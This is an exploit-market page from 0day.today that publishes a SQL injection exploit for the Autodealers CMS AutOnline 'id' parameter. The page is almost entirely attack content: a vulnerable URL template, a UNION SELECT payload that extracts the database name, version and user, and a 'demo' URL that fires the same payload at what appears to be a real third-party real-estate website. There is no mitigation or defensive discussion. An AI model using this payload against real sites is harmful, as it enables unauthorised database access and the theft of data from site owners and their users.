[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Autodealers CMS AutOnline (id) SQL Injection Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3648
Category
web applications
Date add
10-09-2008
Platform
unsorted
==========================================================
Autodealers CMS AutOnline (id) SQL Injection Vulnerability
==========================================================



############################################################################################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu                  
############################################################################################################
[+]
[+]
[+]
[+]

   exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]

[+]
[+]
[+]
[+]

   [SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+]
[+]
[+]   
[+]

   demo:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+] 
[+]
[+] 
############################################################################################################




#  0day.today [2024-10-05]  #